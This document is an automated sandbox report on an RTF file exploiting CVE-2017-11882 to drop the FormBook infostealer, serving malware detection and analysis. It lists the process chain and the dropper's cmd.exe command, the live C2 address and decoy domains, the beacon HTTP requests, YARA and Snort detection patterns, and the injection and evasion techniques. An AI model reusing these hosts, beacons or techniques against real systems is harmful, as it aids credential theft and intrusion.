Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
Analysis ID:680528
MD5:8bfea104ae681494896379e3c647f6ae
SHA1:aaf97d8a987c5060ff06c4031030000d53d3cb31
SHA256:2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
Tags:rtf
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Document contains OLE streams with names of living off the land binaries
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
PE file contains section with special chars
Sample uses process hollowing technique
Office process drops PE file
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3000 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 3060 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2708 cmdline: CmD.exe /C %tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 316 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: B4F00BB75BFD5C4E2C9D0CD6070E8E54)
        • notepad.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • ipconfig.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
              • cmd.exe (PID: 1740 cmdline: /c del "C:\Windows\SysWOW64\notepad.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfMAL_RTF_Embedded_OLE_PEDetects a suspicious string often used in PE files in a hex encoded object streamFlorian Roth
  • 0x1799:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465
  • 0x16fd:$m1: 4d5a90000300000004000000ffff
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1283:$obj2: \objdata
  • 0x1dc298:$obj2: \objdata
  • 0x2bc8ae:$obj3: \objupdate
  • 0x8e8:$obj4: \objemb
  • 0x1db8fd:$obj4: \objemb

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmprtf_cve2017_11882_oleAttempts to identify the exploit CVE 2017 11882John Davison
  • 0xebc00:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0xebc21:$font: 0A 01 08 5A 5A
  • 0xebc52:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xebb00:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x280c:$exe: .exe
  • 0x281f:$exe: .exe
  • 0x283a:$exe: .exe
  • 0xebc29:$exe: .exe
  • 0xebc3d:$exe: .exe
  • 0xebc52:$address: 12 0C 43 00

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 54 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.0.notepad.exe.400000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.0.notepad.exe.400000.3.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        9.0.notepad.exe.400000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.0.notepad.exe.400000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        9.0.notepad.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 47 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.2266.235.200.17049171802031449 08/08/22-18:39:45.738853
          SID:2031449
          Source Port:49171
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22104.167.67.17549172802031449 08/08/22-18:40:04.832440
          SID:2031449
          Source Port:49172
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2266.235.200.17049171802031453 08/08/22-18:39:45.738853
          SID:2031453
          Source Port:49171
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22104.167.67.17549172802031453 08/08/22-18:40:04.832440
          SID:2031453
          Source Port:49172
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2266.235.200.17049171802031412 08/08/22-18:39:45.738853
          SID:2031412
          Source Port:49171
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22104.167.67.17549172802031412 08/08/22-18:40:04.832440
          SID:2031412
          Source Port:49172
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: www.lundadonate.xyz/nb30/Avira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfVirustotal: Detection: 43%Perma Link
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfReversingLabs: Detection: 21%
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Client.exeReversingLabs: Detection: 24%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Client.exeJoe Sandbox ML: detected
          Source: 9.0.notepad.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.notepad.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}

          Exploits

          barindex
          Found potential equation exploit (CVE-2017-11882)
          Source: Static RTF information: Object: 1 Offset: 001DC2BCh
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drStream path '_1721489049/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Document exploit detected (drops PE files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: Client.exe.0.drJump to dropped file
          Document exploit detected (creates forbidden files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to behavior
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficDNS query: name: www.thegoldencamel.online
          Source: global trafficDNS query: name: www.best-boy.net
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then pop ebx9_2_00407B44
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then pop ebx9_2_00407B1C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then pop edi9_2_0040E47A
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.best-boy.net
          Source: C:\Windows\explorer.exeNetwork Connect: 104.167.67.175 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.170 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thegoldencamel.online
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.lundadonate.xyz/nb30/
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: ESITEDUS ESITEDUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: Client.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
